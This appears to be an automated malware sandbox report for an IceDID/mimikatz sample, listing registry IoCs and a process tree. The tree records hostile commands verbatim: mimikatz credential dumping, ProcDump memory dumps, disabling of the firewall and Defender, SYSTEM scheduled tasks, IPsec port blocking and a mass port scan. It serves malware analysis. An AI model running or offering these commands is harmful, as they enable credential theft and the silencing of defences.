Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	guwlsyl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	guwlsyl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	guwlsyl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	guwlsyl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ntaiaautl.exe

Modifies registry class 14 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	guwlsyl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	guwlsyl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	guwlsyl.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4460	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
5064	2024-05-20_a16f02b32270cb86e6d55c74b5a98617_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

description	pid	Process
Token: SeDebugPrivilege	5064	2024-05-20_a16f02b32270cb86e6d55c74b5a98617_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	3448	guwlsyl.exe
Token: SeDebugPrivilege	4896	guwlsyl.exe
Token: SeDebugPrivilege	3040	vfshost.exe
Token: SeDebugPrivilege	4620	ntaiaautl.exe
Token: SeLockMemoryPrivilege	1844	ibyaef.exe
Token: SeLockMemoryPrivilege	1844	ibyaef.exe
Token: SeDebugPrivilege	1900	ntaiaautl.exe
Token: SeDebugPrivilege	4796	ntaiaautl.exe
Token: SeDebugPrivilege	3872	ntaiaautl.exe
Token: SeDebugPrivilege	2148	ntaiaautl.exe
Token: SeDebugPrivilege	1620	ntaiaautl.exe
Token: SeDebugPrivilege	4364	ntaiaautl.exe
Token: SeDebugPrivilege	3320	ntaiaautl.exe
Token: SeDebugPrivilege	3592	ntaiaautl.exe
Token: SeDebugPrivilege	3532	ntaiaautl.exe
Token: SeDebugPrivilege	3136	ntaiaautl.exe
Token: SeDebugPrivilege	3344	ntaiaautl.exe
Token: SeDebugPrivilege	1404	ntaiaautl.exe
Token: SeDebugPrivilege	6128	ntaiaautl.exe
Token: SeDebugPrivilege	5132	ntaiaautl.exe
Token: SeDebugPrivilege	6500	ntaiaautl.exe
Token: SeDebugPrivilege	6688	ntaiaautl.exe
Token: SeDebugPrivilege	6728	ntaiaautl.exe
Token: SeDebugPrivilege	6372	ntaiaautl.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
5064	2024-05-20_a16f02b32270cb86e6d55c74b5a98617_hacktools_icedid_mimikatz.exe
5064	2024-05-20_a16f02b32270cb86e6d55c74b5a98617_hacktools_icedid_mimikatz.exe
3448	guwlsyl.exe
3448	guwlsyl.exe
4896	guwlsyl.exe
4896	guwlsyl.exe
4228	xohudmc.exe
208	ogmqgi.exe
60	guwlsyl.exe
60	guwlsyl.exe
6212	guwlsyl.exe
6212	guwlsyl.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5064 wrote to memory of 3976	5064	2024-05-20_a16f02b32270cb86e6d55c74b5a98617_hacktools_icedid_mimikatz.exe	91
PID 5064 wrote to memory of 3976	5064	2024-05-20_a16f02b32270cb86e6d55c74b5a98617_hacktools_icedid_mimikatz.exe	91
PID 5064 wrote to memory of 3976	5064	2024-05-20_a16f02b32270cb86e6d55c74b5a98617_hacktools_icedid_mimikatz.exe	91
PID 3976 wrote to memory of 4460	3976	cmd.exe	93
PID 3976 wrote to memory of 4460	3976	cmd.exe	93
PID 3976 wrote to memory of 4460	3976	cmd.exe	93
PID 3976 wrote to memory of 3448	3976	cmd.exe	94
PID 3976 wrote to memory of 3448	3976	cmd.exe	94
PID 3976 wrote to memory of 3448	3976	cmd.exe	94
PID 4896 wrote to memory of 3040	4896	guwlsyl.exe	96
PID 4896 wrote to memory of 3040	4896	guwlsyl.exe	96
PID 4896 wrote to memory of 3040	4896	guwlsyl.exe	96
PID 3040 wrote to memory of 1128	3040	cmd.exe	98
PID 3040 wrote to memory of 1128	3040	cmd.exe	98
PID 3040 wrote to memory of 1128	3040	cmd.exe	98
PID 3040 wrote to memory of 216	3040	cmd.exe	99
PID 3040 wrote to memory of 216	3040	cmd.exe	99
PID 3040 wrote to memory of 216	3040	cmd.exe	99
PID 3040 wrote to memory of 800	3040	cmd.exe	100
PID 3040 wrote to memory of 800	3040	cmd.exe	100
PID 3040 wrote to memory of 800	3040	cmd.exe	100
PID 3040 wrote to memory of 5076	3040	cmd.exe	101
PID 3040 wrote to memory of 5076	3040	cmd.exe	101
PID 3040 wrote to memory of 5076	3040	cmd.exe	101
PID 3040 wrote to memory of 4456	3040	cmd.exe	102
PID 3040 wrote to memory of 4456	3040	cmd.exe	102
PID 3040 wrote to memory of 4456	3040	cmd.exe	102
PID 3040 wrote to memory of 1620	3040	cmd.exe	103
PID 3040 wrote to memory of 1620	3040	cmd.exe	103
PID 3040 wrote to memory of 1620	3040	cmd.exe	103
PID 4896 wrote to memory of 4772	4896	guwlsyl.exe	104
PID 4896 wrote to memory of 4772	4896	guwlsyl.exe	104
PID 4896 wrote to memory of 4772	4896	guwlsyl.exe	104
PID 4896 wrote to memory of 3052	4896	guwlsyl.exe	110
PID 4896 wrote to memory of 3052	4896	guwlsyl.exe	110
PID 4896 wrote to memory of 3052	4896	guwlsyl.exe	110
PID 4896 wrote to memory of 4900	4896	guwlsyl.exe	113
PID 4896 wrote to memory of 4900	4896	guwlsyl.exe	113
PID 4896 wrote to memory of 4900	4896	guwlsyl.exe	113
PID 4896 wrote to memory of 3048	4896	guwlsyl.exe	118
PID 4896 wrote to memory of 3048	4896	guwlsyl.exe	118
PID 4896 wrote to memory of 3048	4896	guwlsyl.exe	118
PID 3048 wrote to memory of 2880	3048	cmd.exe	120
PID 3048 wrote to memory of 2880	3048	cmd.exe	120
PID 3048 wrote to memory of 2880	3048	cmd.exe	120
PID 2880 wrote to memory of 4424	2880	wpcap.exe	121
PID 2880 wrote to memory of 4424	2880	wpcap.exe	121
PID 2880 wrote to memory of 4424	2880	wpcap.exe	121
PID 4424 wrote to memory of 3976	4424	net.exe	123
PID 4424 wrote to memory of 3976	4424	net.exe	123
PID 4424 wrote to memory of 3976	4424	net.exe	123
PID 2880 wrote to memory of 3448	2880	wpcap.exe	125
PID 2880 wrote to memory of 3448	2880	wpcap.exe	125
PID 2880 wrote to memory of 3448	2880	wpcap.exe	125
PID 3448 wrote to memory of 216	3448	net.exe	127
PID 3448 wrote to memory of 216	3448	net.exe	127
PID 3448 wrote to memory of 216	3448	net.exe	127
PID 2880 wrote to memory of 3832	2880	wpcap.exe	128
PID 2880 wrote to memory of 3832	2880	wpcap.exe	128
PID 2880 wrote to memory of 3832	2880	wpcap.exe	128
PID 3832 wrote to memory of 4372	3832	net.exe	130
PID 3832 wrote to memory of 4372	3832	net.exe	130
PID 3832 wrote to memory of 4372	3832	net.exe	130
PID 2880 wrote to memory of 1948	2880	wpcap.exe	131

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2076
- C:\Windows\TEMP\ttltnyvty\ibyaef.exe
  "C:\Windows\TEMP\ttltnyvty\ibyaef.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1844

C:\Users\Admin\AppData\Local\Temp\2024-05-20_a16f02b32270cb86e6d55c74b5a98617_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-20_a16f02b32270cb86e6d55c74b5a98617_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\jetgmbly\guwlsyl.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3976
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - Runs ping.exe
    PID:4460
- - C:\Windows\jetgmbly\guwlsyl.exe
    C:\Windows\jetgmbly\guwlsyl.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3448

C:\Windows\jetgmbly\guwlsyl.exe
C:\Windows\jetgmbly\guwlsyl.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1128
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:800
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:5076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4456
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:1620
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  PID:4772
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  PID:3052
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  PID:4900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\lbtermtbs\etamgyklt\wpcap.exe /S
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3048
- - C:\Windows\lbtermtbs\etamgyklt\wpcap.exe
    C:\Windows\lbtermtbs\etamgyklt\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:2880
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4424
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:3976
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3448
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:216
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3832
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        
        PID:4372
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      PID:1948
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        
        PID:2296
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:4368
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:4224
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:4940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:4776
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:1288
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:2740
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\lbtermtbs\etamgyklt\betzilvlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lbtermtbs\etamgyklt\Scant.txt
  2⤵
  PID:912
- - C:\Windows\lbtermtbs\etamgyklt\betzilvlu.exe
    C:\Windows\lbtermtbs\etamgyklt\betzilvlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lbtermtbs\etamgyklt\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:416
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\lbtermtbs\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\lbtermtbs\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:2252
- - C:\Windows\lbtermtbs\Corporate\vfshost.exe
    C:\Windows\lbtermtbs\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3040
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tmessluuv" /ru system /tr "cmd /c C:\Windows\ime\guwlsyl.exe"
  2⤵
  PID:4572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4240
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "tmessluuv" /ru system /tr "cmd /c C:\Windows\ime\guwlsyl.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lewlyngkg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F"
  2⤵
  PID:4892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4304
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "lewlyngkg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F"
    3⤵
    - Creates scheduled task(s)
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yaubemieu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F"
  2⤵
  PID:212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1444
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "yaubemieu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F"
    3⤵
    - Creates scheduled task(s)
    PID:412
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  PID:32
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  PID:4664
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:4284
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:3264
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  PID:4700
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  PID:644
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:4748
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:3384
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  PID:3604
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  PID:4196
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:4124
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 788 C:\Windows\TEMP\lbtermtbs\788.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4620
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:4240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  PID:2308
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:2908
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      PID:4572
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  PID:3828
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    PID:4560
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:4784
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  PID:1288
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    PID:2604
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:1172
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  PID:1576
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:3396
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:4724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  PID:3264
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:1120
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      PID:4048
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  PID:3780
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:5060
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:812
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:3736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  PID:2992
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:3968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:4904
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:3080
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 1020 C:\Windows\TEMP\lbtermtbs\1020.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1900
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  PID:4228
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2076 C:\Windows\TEMP\lbtermtbs\2076.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4796
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2572 C:\Windows\TEMP\lbtermtbs\2572.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3872
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2664 C:\Windows\TEMP\lbtermtbs\2664.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2148
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2824 C:\Windows\TEMP\lbtermtbs\2824.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1620
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 1412 C:\Windows\TEMP\lbtermtbs\1412.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4364
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3712 C:\Windows\TEMP\lbtermtbs\3712.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
